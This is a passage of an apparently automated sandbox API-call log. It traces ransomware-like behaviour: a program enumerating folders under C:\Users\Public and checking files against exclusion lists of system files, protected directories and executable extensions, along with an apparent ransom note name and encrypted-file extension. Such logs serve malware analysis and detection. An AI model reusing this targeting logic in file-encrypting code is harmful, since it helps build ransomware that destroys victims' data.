ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.367] StrCmpW (psz1="..", psz2=".") returned 1 [0090.367] StrCmpW (psz1="..", psz2="..") returned 0 [0090.367] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x38bb5c78, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x852, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Acrobat Reader DC.lnk", cAlternateFileName="ACROBA~1.LNK")) returned 1 [0090.367] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2=".") returned 1 [0090.367] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2="..") returned 1 [0090.367] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0090.367] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0090.367] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Acrobat Reader DC.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" [0090.368] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0090.368] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootsect.bak") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="iconcache.db") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="thumbs.db") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransomware ") returned 1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransom ") returned 1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="debug.txt") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="boot.ini") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="desktop.ini") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="autorun.inf") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntuser.dat") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntldr") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntdetect.com") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootfont.bin") returned -1 [0090.368] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.368] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0090.368] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0090.368] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.368] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.368] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.368] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0090.368] StrCmpW (psz1="Google Chrome.lnk", psz2=".") returned 1 [0090.368] StrCmpW (psz1="Google Chrome.lnk", psz2="..") returned 1 [0090.368] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0090.368] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0090.368] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Google Chrome.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" [0090.368] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0090.368] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0090.368] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootsect.bak") returned 1 [0090.368] StrCmpIW (psz1="Google Chrome.lnk", psz2="iconcache.db") returned -1 [0090.368] StrCmpIW (psz1="Google Chrome.lnk", psz2="thumbs.db") returned -1 [0090.368] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransomware ") returned 1 [0090.368] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransom ") returned 1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="debug.txt") returned 1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="boot.ini") returned 1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="desktop.ini") returned 1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="autorun.inf") returned 1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntuser.dat") returned -1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntldr") returned -1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntdetect.com") returned -1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootfont.bin") returned 1 [0090.369] StrCmpIW (psz1="Google Chrome.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.369] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0090.369] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0090.369] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0090.369] StrCmpW (psz1="Mozilla Firefox.lnk", psz2=".") returned 1 [0090.369] StrCmpW (psz1="Mozilla Firefox.lnk", psz2="..") returned 1 [0090.369] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0090.369] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0090.369] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Mozilla Firefox.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0090.369] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0090.369] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootsect.bak") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="iconcache.db") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="thumbs.db") returned -1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransomware ") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransom ") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="debug.txt") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="boot.ini") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="desktop.ini") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="autorun.inf") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntuser.dat") returned -1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntldr") returned -1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntdetect.com") returned -1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootfont.bin") returned 1 [0090.369] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.369] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0090.370] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0090.370] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0090.370] FindClose (in: hFindFile=0xec24f0 | out: hFindFile=0xec24f0) returned 1 [0090.370] GetProcessHeap () returned 0xe30000 [0090.370] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.370] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.370] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.370] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.370] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0090.370] StrCmpW (psz1="Documents", psz2=".") returned 1 [0090.370] StrCmpW (psz1="Documents", psz2="..") returned 1 [0090.370] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.370] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.370] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Documents", cchMax=1056 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\boot\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.370] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="crypt_detect") returned 0x0 [0090.371] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="cryptolocker") returned 0x0 [0090.371] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="ransomware") returned 0x0 [0090.371] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0090.371] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.371] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0090.371] GetProcessHeap () returned 0xe30000 [0090.371] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xedc0f8 [0090.371] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Documents", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0090.371] StrNCatW (in: psz1="C:\\Users\\Public\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents\\*") returned="C:\\Users\\Public\\Documents\\*" [0090.371] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0090.372] StrCmpW (psz1=".", psz2=".") returned 0 [0090.372] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.372] StrCmpW (psz1="..", psz2=".") returned 1 [0090.372] StrCmpW (psz1="..", psz2="..") returned 0 [0090.372] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.372] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.372] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.372] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0090.372] StrCmpW (psz1="My Music", psz2=".") returned 1 [0090.372] StrCmpW (psz1="My Music", psz2="..") returned 1 [0090.372] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0090.372] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0090.372] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0090.372] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0090.372] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0090.372] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0090.372] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0090.372] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0090.373] GetProcessHeap () returned 0xe30000 [0090.373] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedc0f8 | out: hHeap=0xe30000) returned 1 [0090.373] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0090.373] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0090.373] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0090.373] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0090.373] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0090.373] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0090.373] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="crypt_detect") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="cryptolocker") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="ransomware") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.374] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0090.374] GetProcessHeap () returned 0xe30000 [0090.374] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xedc0f8 [0090.374] StrCpyNW (in: psz1=0xedc0f8, psz2="C:\\Users\\Public\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0090.374] StrNCatW (in: psz1="C:\\Users\\Public\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads\\*") returned="C:\\Users\\Public\\Downloads\\*" [0090.374] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0090.374] StrCmpW (psz1=".", psz2=".") returned 0 [0090.374] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.374] StrCmpW (psz1="..", psz2=".") returned 1 [0090.374] StrCmpW (psz1="..", psz2="..") returned 0 [0090.374] FindNextFileW (in: hFindFile=0xec23b0, 